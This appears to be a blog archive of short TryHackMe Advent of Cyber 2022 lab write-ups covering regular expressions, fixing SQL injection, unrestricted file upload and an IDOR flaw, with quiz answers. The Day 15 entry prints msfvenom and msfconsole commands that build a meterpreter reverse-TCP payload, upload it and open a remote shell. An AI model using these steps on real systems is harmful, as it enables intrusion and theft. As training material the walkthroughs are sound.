Showing posts with label AdventOfCyber. Show all posts
Showing posts with label AdventOfCyber. Show all posts

Saturday, December 17, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 17 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Day 17 covers topic of the Regular Expressions.
  1. Question 1, Question 2
    2. To answer first two questions you can use following regular expression:
    ^[a-zA-Z0-9]{6,12}$
  2. Question 3, Question 4
    3. Following regular expression will help you get answers:
    ^.+@.+\.com$
  3. Question 5
    4. Following regular expression will help you get answers:
    lewisham44
  4. Question 6
    5. Following regular expression will help you get answers:
    maxximax
  5. Question 7
    6. Following regular expression will help you get answers:
    ^.+@.+\.com$
  6. Question 8, Question 9
    7. ^http(s)?.{3}(www)?.+..+$
I hope anyone who gets stuck finds it helpful
AudiTTRSi
at No comments:
Labels: , , , ,

Friday, December 16, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 16 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Today's task covers topic of SQL Injection (SQLi). SQL injection is the placement of malicious code in SQL statements, via web page input. Attackers will most probably try to querry the database return all of the users and passwords of the application if this vulnerability exist. Before you start with solving task you need to boot up VM in the task and attackbox for accessing the page. It will probably take a minute or two to boot up. After that we can open link to the developer page of the app we will try to fix. We login with provided credentials.
  1. Question 1 - Fixing SQLi by Data Type Validation
    2. First we use fix from description of the task to fix first and then second querry in the elf.php file after we have saved and press run we will get the first flag
  2. Question 2 - Fixing SQLi Using Prepared Statements
    3. With prepared statment described in the task we can quickly fix the search_toys.php and get second flag.
  3. Question 3
    4. To find the third flag we need to fix toy.php we can easly fix it same way we fix the elf.php with data type validation.
  4. Question 4
    5. For fixing the 4th vunlerability and getting forth flag we will need to fix the login.php. We do it with prepared statment as we did with second flag. Just make sure you use $username and $password instead of $q
I hope anyone who gets stuck finds it helpful
AudiTTRSi
at No comments:
Labels: , , , , , ,

TryHackMe.com - Advent of Cyber 2022 - Day 15 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 15, if anyone gets stuck or need bit of help solving questions. Today's task is addressing issues of input validation of file upload funtionality and unrestricted file upload vulnerabilities. If any of these things are implemented during development of the site threat actor can exploit it and get access to the server. First you need to boot up VM and Attackbox since they will take some time to boot up. All questions exepct Q3 can be answered by carefully reading task description of vulnerabilities and how to avoid them. For Q3 we need to create the paypload, we got the command in task description:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttackBox_IP LPORT="Listening port" -f exe -o cv-username.exe
It will take a minute to generate it. It will be saved on attackbox /root folder. then you run second command to create the listener :
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST AttackBox_IP; set LPORT 'listening port'; exploit"
After that we can head to the firefox browser and upload the payload file we created with first step. Now we can open listener window and wait until the file that we uploaded to website will be run. When connection is active we can move through directories
  1. pwd to check where we are
  2. cd ../..
  3. we head to the folder HR Elf's Documents directory
  4. cat flag.txt
I hope anyone who gets stuck finds it helpful
AudiTTRSi
at No comments:
Labels: , , , , ,

Wednesday, December 14, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 14 - writeup

Advent of Cyber is now regular seasonal room on TryHackMe page. This is their 4th time and again with awsome story to follow each day's assignment. Here are my solutions for the Day 14, if anyone gets stuck or need bit of help solving questions. First you need to boot up VM and attackbox since they will take some time to boot up. After both VM and attackbox machine are booted up you can open the website on provided ip and port 8080 and log in with credentials provided in description of the task. Because of vulnerability present in the website applicaton we can freely change ids in the web address and we cycle (changing profile id numbers) through registered users and find answer to the first question.
For second one we copy profile picture and we change id number for images, because profile images have same vulnerability and we can cycle through pictures and we can find the picuter containing flag which is answer of the second question. I hope anyone who gets stuck finds it helpful
AudiTTRSi
at No comments:
Labels: , , , , ,
Subscribe to: Comments (Atom)

TryHackMe - Shadow Trace Writeup

 Shadow Trace is premium room on TryHackMe.com part of the SOC Level 1 Path. We need to analyse a suspicious file, uncover hidden clues, an...